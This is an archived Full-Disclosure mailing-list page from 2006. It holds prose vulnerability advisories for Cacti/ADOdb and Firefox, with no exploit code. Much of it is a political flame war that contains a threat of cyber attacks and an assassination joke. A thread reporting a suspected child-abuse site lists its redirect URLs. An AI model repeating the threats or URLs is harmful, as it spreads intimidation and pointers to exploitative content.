http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
At no point in your statement did you indicate that in fact it was an opinion - it was written as an assertion of future action (granted, conditional on another future action). Assertions of the surety of actions occurring in the future imply prior knowledge of their occuurance, hence my statement in regards to being involved in a conspiracy. However, my statement was meant more in the vein of sarcasm - think of it as a watch out mate. Some people don't really seem to like you much, and might very well be vindictive enough to try and get you involved in legal difficulties should these presumed attacks occur. And in addition, under what basis are you assuming that I am a US citizen? n3td3v wrote: I'm expressing an opinion. You know, the reason you guys are bombing the hell out of innocent civils for, to make it possible for folks to express an opinion. If this was China, I wouldn't be allowed to express an opinion, i'd be locked up or have my house knocked down, to make room for sky scrapers to develop upon. This is a UK maling list, and while you Ameircans don't believe in freedom, we in UK do, so go ahead, arrest me, make me a cyber celebrity and throw away the key. Thats what the super power of freedom does, locks people up and throw away the key, without a trial. On 4/14/06, Nobody Particular [EMAIL PROTECTED] wrote: Ah, so you're stating you have prior knowledge of and involvement in a Felony conspiracy? n3td3v wrote: Because theres going to be major cyber attacks next month if this guy is sent to the United States. On 4/14/06, joe haldon [EMAIL PROTECTED] wrote: Why are people bringing politics into the mailing lists? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
But the majority do, because he was re-voted into power. Unless you know of any e-voting conspiracies? On 4/14/06, Dixon, Wayne [EMAIL PROTECTED] wrote: Remember, not everybody in America shares the same opinion as those who are in charge. Bush's approval rating is 35%, the lowest of his presidency, and I expect that it will only get lower. Nobody says anybody approves of the bombing of civilians. Webguy -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: Friday, April 14, 2006 2:48 PM To: Nobody Particular; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Gary McKinnon I'm expressing an opinion. You know, the reason you guys are bombing the hell out of innocent civils for, to make it possible for folks to express an opinion. If this was China, I wouldn't be allowed to express an opinion, i'd be locked up or have my house knocked down, to make room for sky scrapers to develop upon. This is a UK maling list, and while you Ameircans don't believe in freedom, we in UK do, so go ahead, arrest me, make me a cyber celebrity and throw away the key. Thats what the super power of freedom does, locks people up and throw away the key, without a trial. On 4/14/06, Nobody Particular [EMAIL PROTECTED] wrote: Ah, so you're stating you have prior knowledge of and involvement in a Felony conspiracy? n3td3v wrote: Because theres going to be major cyber attacks next month if this guy is sent to the United States. On 4/14/06, joe haldon [EMAIL PROTECTED] wrote: Why are people bringing politics into the mailing lists? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
Dixon, Wayne wrote: Remember, not everybody in America shares the same opinion as those who are in charge. Bush's approval rating is 35%, the lowest of his presidency, and I expect that it will only get lower. Nobody says anybody approves of the bombing of civilians. And only liars claim the US bombs civilians. But those Al Qaeda guysnow *they* act on principle -- Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas http://www.utdallas.edu/ir/security/ smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
I wasn't talking about Iraq. I was talking about Gbay, which the UK and the United Nations have told the United States to close down, which they said NO to. Like the United States said NO to the United Nations, when the United Nations told the United States not to attack Iraq. With United States, its a big NO to the world. On 4/14/06, Paul Schmehl [EMAIL PROTECTED] wrote: So *that's* why you Brits are involved in Iraq... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Yo Paul! On Fri, 14 Apr 2006, Paul Schmehl wrote: Nobody says anybody approves of the bombing of civilians. And only liars claim the US bombs civilians. Funniest thing I heard all day. RGDS GARY - --- Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701 [EMAIL PROTECTED] Tel:+1(541)382-8588 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.1 (GNU/Linux) iD8DBQFEQAF88KZibdeR3qURAu1UAKDrP7P70V36aEsa8mmpKkuiHjRRQgCdEbDe Ui9dWWrDIYFwTxJ0G5owdfg= =KiOW -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
I'll bite. On Fri, 2006-04-14 at 20:47 +0100, n3td3v wrote: and while you Ameircans don't believe in freedom, we in UK do, so go ahead, arrest me, make me a cyber celebrity and throw away the key. Thats what the super power of freedom does, locks people up and throw away the key, without a trial. Take a peek at: http://www.publications.parliament.uk/pa/cm200506/cmbills/141/06141.i-ii.htm Lovingly known as the Abolition of Parliament Bill. Any Government minister can Create, Update or Delete almost[0] any law *without* reference to Parliament. No debate, no vote, no nothing. ... and tell me that the British population is interested in freedom. Fifty years of progressive change and the population is neutered. A nation primarily formed of slaves and cowards. With all the faults that America has, at least a higher proportion of their population is still willing to stand up to their corrupt government and show they have some balls. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
Paul Schmehl wrote: Dixon, Wayne wrote: Remember, not everybody in America shares the same opinion as those who are in charge. Bush's approval rating is 35%, the lowest of his presidency, and I expect that it will only get lower. Nobody says anybody approves of the bombing of civilians. And only liars claim the US bombs civilians. And only morons ignore the military concept of collateral damage. So far, I haven't heard anyone say that the United States military targets civilians, simply that they bomb them... and all that has to happen for that statement to be true is for bombs to inflict damage to civilians, which is virtually guaranteed in war. Not that intellectual honesty is anything that the average neo-con knows anything about... You're still stuck on They're greeting us with flowers and candy from a conceptual standpoint... The reality-impaired right wing needs to reconsider its positions. -bkfsec ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
n3td3v wrote: I wasn't talking about Iraq. I was talking about Gbay, which the UK and the United Nations have told the United States to close down, which they said NO to. Like the United States said NO to the United Nations, when the United Nations told the United States not to attack Iraq. With United States, its a big NO to the world. And hopefully the next big NO from the US will be - NO, you can't house your stupid, worthless, bureaucratic, corrupt, steaming pile of horse manure in our country any more. Find another place. You have six months to move. -- Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas http://www.utdallas.edu/ir/security/ smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MySpace or Montspace?
Hello mailing list...I know that all the kids are using myspace and getting abused, and all the media is about them...But what about the social networking site http://www.montspace.com ? You don't hear ANYTHING ever about that site, however it is by far WORSE than myspace!Let me know what you think guys!-Bob ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
Paul Schmehl wrote: And hopefully the next big NO from the US will be - NO, you can't house your stupid, worthless, bureaucratic, corrupt, steaming pile of horse manure in our country any more. Find another place. You have six months to move. I think you're confused. This is what the US will be saying to the regressive, fascist, corrupt neo-conservative movement. -bkfsec ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
n3tdev, can you pls post some hirespics of yourself? almost every serious security researcher has pictures of himself on the interweb (look at Dave Aitel, he's a cat!)Thanks!On 4/14/06, bkfsec [EMAIL PROTECTED] wrote: Paul Schmehl wrote: And hopefully the next big NO from the US will be - NO, you can't house your stupid, worthless, bureaucratic, corrupt, steaming pile of horse manure in our country any more.Find another place.You have six months to move.I think you're confused.This is what the US will be saying to theregressive, fascist, corrupt neo-conservative movement.-bkfsec___ Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
Poor English skills? On 4/14/06, Nobody Particular [EMAIL PROTECTED] wrote: snip/ And in addition, under what basis are you assuming that I am a US citizen? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Gary McKinnon
Plenty of pics here http://images.google.com/images?q=douchebaghl=enbtnG=Search+Images From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of MR BABSSent: Friday, April 14, 2006 3:26 PMTo: full-disclosureSubject: Re: [Full-disclosure] Gary McKinnon n3tdev, can you pls post some hirespics of yourself? almost every serious security researcher has pictures of himself on the interweb (look at Dave Aitel, he's a cat!)Thanks! On 4/14/06, bkfsec [EMAIL PROTECTED] wrote: Paul Schmehl wrote: And hopefully the next big NO from the US will be - NO, you can't house your stupid, worthless, bureaucratic, corrupt, steaming pile of horse manure in our country any more.Find another place.You have six months to move.I think you're confused.This is what the US will be saying to theregressive, fascist, corrupt neo-conservative movement.-bkfsec___ Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ --No virus found in this incoming message.Checked by AVG Free Edition.Version: 7.1.385 / Virus Database: 268.4.1/311 - Release Date: 4/13/2006 -- No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.1.385 / Virus Database: 268.4.1/311 - Release Date: 4/13/2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
On 4/14/06, *bkfsec* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Paul Schmehl wrote: And hopefully the next big NO from the US will be - NO, you can't house your stupid, worthless, bureaucratic, corrupt, steaming pile of horse manure in our country any more. Find another place. You have six months to move. I think you're confused. This is what the US will be saying to the regressive, fascist, corrupt neo-conservative movement. Just like they have in all the previous elections, huh? -- Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas http://www.utdallas.edu/ir/security/ smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200604-07 ] Cacti: Multiple vulnerabilities in included ADOdb
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200604-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Cacti: Multiple vulnerabilities in included ADOdb Date: April 14, 2006 Bugs: #129284 ID: 200604-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities have been discovered in the ADOdb layer included in Cacti, potentially resulting in the execution of arbitrary code. Background == Cacti is a complete web-based frontend to rrdtool. ADOdb is a PHP-based database abstraction layer which is included in Cacti. Affected packages = --- Package /Vulnerable/Unaffected --- 1 cacti 0.8.6h_p20060108-r2 = 0.8.6h_p20060108-r2 Description === Several vulnerabilities have been identified in the copy of ADOdb included in Cacti. Andreas Sandblad discovered a dynamic code evaluation vulnerability (CVE-2006-0147) and a potential SQL injection vulnerability (CVE-2006-0146). Andy Staudacher reported another SQL injection vulnerability (CVE-2006-0410), and Gulftech Security discovered multiple cross-site-scripting issues (CVE-2006-0806). Impact == Remote attackers could trigger these vulnerabilities by sending malicious queries to the Cacti web application, resulting in arbitrary code execution, database compromise through arbitrary SQL execution, and malicious HTML or JavaScript code injection. Workaround == There is no known workaround at this time. Resolution == All Cacti users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-analyzer/cacti-0.8.6h_p20060108-r2 References == [ 1 ] CVE-2006-0146 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0146 [ 2 ] CVE-2006-0147 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0147 [ 3 ] CVE-2006-0410 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0410 [ 4 ] CVE-2006-0806 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0806 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200604-07.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
On Fri, 14 Apr 2006, joe haldon wrote: And why should people demonize a person or party just because they don't agree? Generally, demonizing the other side is neither factually correct nor ethically responsible, *however*, since GWB *IS*, -in fact-, the devil himself What I wanna know is this: we have perfectly good, responsible assasins in prison -- doing NOTHING --, when they could be *put to work* for the State. Lets face it, we NEED this service right now! -- Yours, J.A. Terranson [EMAIL PROTECTED] 0xBD4A95BF 'The right of self defence is the first law of nature: in most governments it has been the study of rulers to confine this right within the narrowest limits possible. Wherever standing armies are kept up, and the right of the people to keep and bear arms is, under any colour or pretext whatsoever, prohibited, liberty, if not already annihilated, is on the brink of destruction.' St. George Tucker ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
Ah, so you're stating you have prior knowledge of and involvement in a Felony conspiracy? Naw... He read something about it on rne -- Yours, J.A. Terranson [EMAIL PROTECTED] 0xBD4A95BF 'The right of self defence is the first law of nature: in most governments it has been the study of rulers to confine this right within the narrowest limits possible. Wherever standing armies are kept up, and the right of the people to keep and bear arms is, under any colour or pretext whatsoever, prohibited, liberty, if not already annihilated, is on the brink of destruction.' St. George Tucker ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
[EMAIL PROTECTED] wrote: On Fri, 14 Apr 2006 20:57:05 BST, n3td3v said: But the majority do, because he was re-voted into power. Pay attention. Less than 50% of the eligible voters voted for him. Pay closer attention. He was ELECTED. Makes you feel all warm and fuzzy inside, don't it? -- Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas http://www.utdallas.edu/ir/security/ smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
You can't please everyone all of the time, but you can piss off everyone all of the time and that is showing impartiality. Sorry, I have to nit-pick. On Fri, 2006-04-14 at 14:56 -0500, Paul Schmehl wrote: And only liars claim the US bombs civilians. There is no doubt whatsoever that the US has bombed civilians, hell - the US bombed their British allies and the Chinese embassy :-). The question is whether the targetting of civillians was intentional. By and large in Iraq I would hold believe No. The reason for the by and large is that the US did intentionally target Al Jazeera journalists. Whether you consider them civilians or targets depends entirely on your point of view. My personal opinion is that they are civilians. But those Al Qaeda guysnow *they* act on principle Actually, they do. Just because the principle is morally corrupt doesn't mean that it isn't a principle. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
On Fri, 2006-04-14 at 20:57 +0100, n3td3v wrote: But the majority do, because he was re-voted into power. Unless you know of any e-voting conspiracies? You would not believe the amount of corruption in the e-voting system. By corruption I am not talking about political corruption but lack of data integrity. Auditing from 3rd parties on records from random voting machines have showed voting timestamps over a period of 25 years. The software company claims that the data however is still valid :-D ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
On Fri, 2006-04-14 at 15:12 -0500, Paul Schmehl wrote: And hopefully the next big NO from the US will be - NO, you can't house your stupid, worthless, bureaucratic, corrupt, steaming pile of horse manure in our country any more. Find another place. You have six months to move. Amen. We have enough problems keeping our own lot of festering corrupt politicians in line without having to worry about another group which we have no say in. I like my Foreign Policy like I like my Women. Free trade with all, entanglements with none :-) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
On Fri, 2006-04-14 at 21:07 +0100, n3td3v wrote: which they said NO to. Like the United States said NO to the United Nations, when the United Nations told the United States not to attack Iraq. One of the advantages of being a soverign nation is that you can ignore other countries and organisations. I'm sure you would be the first to complain if the UN decided to try to ban security scanning and exploit software from all member nations (as they have been trying to do with small-arms). Surely it is up to any country to decide its own domestic and foreign policy. Remember the fundimental cause of WWI was a chain-reaction of treaties. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MySpace or Montspace?
Seek help. echo www.montspace.com |mail -s suspected child porn [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
Redvers Davies wrote: But those Al Qaeda guysnow *they* act on principle Actually, they do. Indeed -- and it's basically the same principle (God is good and we are enacting his will) as guides the US' current loony fundamentalist Christian right neo-con government... Just because the principle is morally corrupt doesn't mean that it isn't a principle. ...which makes this correct observation of yours all the more telling. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MySpace or Montspace?
Michael Holstein wrote: Seek help. echo www.montspace.com |mail -s suspected child porn [EMAIL PROTECTED] Holy hell. It's unbelievable that images of such explicit nature are available just like that. This almost looks like some sort of government honeypot to catch 60y old hairy men. - Vincent ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MySpace or Montspace?
Fixer wrote: The site is hosted out of Moscow, actually. Needless to say I already sent a message to the provider and Interpol about it. Yes, I contacted interpol too. Which address did you use? I sent it to cp [at] interpol [dot] int. A quick portscan yielded: - The SYN Stealth Scan took 15.46s to scan 1663 total ports. Interesting ports on web-customers-pa-20-100.justdns.org (85.249.20.100): (The 1659 ports scanned but not shown below are in state: closed) PORTSTATESERVICE 21/tcp open ftp 25/tcp filtered smtp 80/tcp open http 873/tcp open rsync WHOIS info: --- Domain Name: MONTSPACE.COM Registrant: Mider Mider([EMAIL PROTECTED]) NWS Canada Larnaka,659823 CY Tel. +001.41512345678 Creation Date: 09-Jan-2006 Expiration Date: 09-Jan-2007 Domain servers in listed order: ns0.dnscustom.biz ns1.dnscustom.biz Administrative Contact: Mider Mider([EMAIL PROTECTED]) NWS Canada Larnaka,659823 CY Tel. +001.41512345678 Technical Contact: Mider Mider([EMAIL PROTECTED]) NWS Canada Larnaka,659823 CY Tel. +001.41512345678 Billing Contact: Mider Mider([EMAIL PROTECTED]) NWS Canada Larnaka,659823 CY Tel. +001.41512345678 Status:ACTIVE - Vincent ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MySpace or Montspace?
Michael Holstein wrote: Seek help. echo www.montspace.com |mail -s suspected child porn [EMAIL PROTECTED] From a look at the source code of the above site every image and every link points to ... http://www.montspace.com/out.php?url=http://tonpa.com/in_traff.phplink=gals=30first=1 A GET request and one is always greeted with HTTP/1.1 302 Found. The result can be one of the following sites: http : //minigirls.biz/ http : //young-models.org/?montspace.com http : //pic.lolkiss.info?id=montspacecom/ http : //tonpa.com/search.php?q=viagra http : //www.hot-girl.ws?montspace.com http : //www.nude-teens.ws?montspace.com http : //www.teensexyworld.com/?ref=montspace.com http : //tonpa.com/search.php?q=debt consolidation http : //www.magic-girls.org/?ref=montspace.com http : //www.russexland.com/?ref=montspace.com http : //gals.girlstested.com http : //pinkvirgins.info/free/ http : //tonpa.com/search.php?q=mesothelioma Regards, Axel Pettinger ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MySpace or Montspace?
The site is hosted out of Moscow, actually. Needless to say I already sent a message to the provider and Interpol about it. -cdh Vincent van Scherpenseel wrote: Michael Holstein wrote: Seek help. echo www.montspace.com |mail -s suspected child porn [EMAIL PROTECTED] Holy hell. It's unbelievable that images of such explicit nature are available just like that. This almost looks like some sort of government honeypot to catch 60y old hairy men. - Vincent ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OSVDB Launches Vulnerability Comment Feature
OSVDB Launches Vulnerability Comment Feature The Open Source Vulnerability Database (OSVDB) has, from the beginning, been a database built and maintained for the community, by the community. In an effort to further that mission, the project has recently added the ability for security practitioners to comment on vulnerabilities in OSVDB. There are mail list discussions, blogs, bug tracking systems and many other forums for clarifying vulnerability information. Such follow-up often adds information like affected versions, exploitation caveats and additional attack vectors. Unfortunately, this information is often spread out among many sources and remains mostly unknown to a large portion of the community that uses and relies on such details. While OSVDB has made every effort to include such references in some fashion, we have always desired a better and more concise method for the community to add information about a vulnerability. To help facilitate this, OSVDB will now allow users to comment on specific vulnerabilities. The project hopes this will provide a place for additional information to be maintained in a consolidated location. All user submissions will be moderated to ensure the information is clear, concise and helpful to others. As always, the OSVDB project thanks you for your support, and continues to look for additional volunteers to help update the content and develop new services. For more information on supporting OSVDB through volunteering or sponsorship, please contact [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Gary McKinnon
n3td3v wrote: Gary McKinnon To Speak At Infosecurity Europe Hacking Panel So, will anyone else from FD be there to see him? I'll be in the pub across the road /i -- And what exactly is a dream? And what exactly is a joke? - Syd Barrett ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup
On Fri, Apr 14, 2006 at 06:00:23PM +0200, Vidar L?kken wrote: So, the exception is not that the IP is hard-coded, but that the DNS resolver skips looking in hosts for that _domain_ and necessarily does a network DNS lookup... Unless the DNS server is itself hardcoded in MediaPlayer, as well? My guess is that it uses a default dns server from microsoft at a stable IP. Why guess when it takes all of 30 seconds to *see* what happens? I tried (using go.microsoft.com), and saw that it uses the same DNS server as the one being used for all other queries. -- Jurjen Oskam Savage's Law of Expediency: You want it bad, you'll get it bad. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MySpace or Montspace?
The site is hosted out of Moscow, actually. Needless to say I already sent a message to the provider and Interpol about it. Aye, and I'm another party that has messaged Interpol. While I'm glad that the OP alerted to the presence of the site it most certainly should have come with a warning as to the nature. That in *no* way can be compared to myspace.com! kw ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-06-010: Mozilla Firefox CSS Letter-Spacing Heap Overflow Vulnerability
ZDI-06-010: Mozilla Firefox CSS Letter-Spacing Heap Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-010.html April 13, 2006 -- CVE ID: CVE-2006-1730 -- Affected Vendor: Mozilla -- Affected Products: Mozilla 1.7.x and below Firefox 1.5.x and below -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since January 31, 2006 by Digital Vaccine protection filter ID 4097. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of the Mozilla/Firefox web browser. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw is due to incorrect handling of the CSS letter-spacing element. By specifying a large number, an attacker can overflow an integer used during memory allocation. The under-allocated buffer is later used to store user-supplied data leading to an exploitable heap overflow. -- Vendor Response: Mozilla has issued an update to correct this vulnerability. Details are available at: http://www.mozilla.org/security/announce/2006/mfsa2006-22.html -- Disclosure Timeline: 2006.01.31 - Vulnerability reported to vendor 2006.01.31 - Digital Vaccine released to TippingPoint customers 2006.04.13 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by an anonymous researcher. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Hopefully
Hopefully with your pooled intelligence and knowledge you can find this sick individual and bring him to justice. Seriously folks. I contacted our local FBI, they told me to also contact the State Police, The Center For Missing And Exploited Children, which I did. That individual cannot be allowed to walk free. -BEGIN GEEK CODE BLOCK- Version: 3.1 GCM/GIT/GO d- s: a C$ UL P L E W N+ o K++ w O- M- V-- PS+ PE Y++ PGP++ t+ 5-- X+ R* tv++ b+ DI++ D G++ e h r+++ y --END GEEK CODE BLOCK-- Get Your Geek Code: http://www.geekcode.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] LOOKING VPN TRAFIIC MONITRING SOFTWARE
HI all.. I am just looking for some software that i can monitor the traffic for VPN sessions or traffic,, I prefer if this software is free to download or some one can send me this software!!! best regards b ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LOOKING VPN TRAFIIC MONITRING SOFTWARE
On Sat, 15 Apr 2006 03:05:40 -, adnan habib said: I am just looking for some software that i can monitor the traffic for VPN sessions or traffic,, I prefer if this software is free to download or some one can send me this software!!! What exactly were you trying to measure/monitor? Keep in mind that unless the software is co-located with one or the other endpoint of the VPN, the only thing you can see is that there's a connection, and it's carrying XYZ bytes of traffic. (Obviously, if *you* were able to monitor the traffic content itself at a midpoint, so could an evildoer - which would mean the VPN was worthless...) pgpRAtZhIWrsd.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FW: Closed Support Request Ticket No:109175
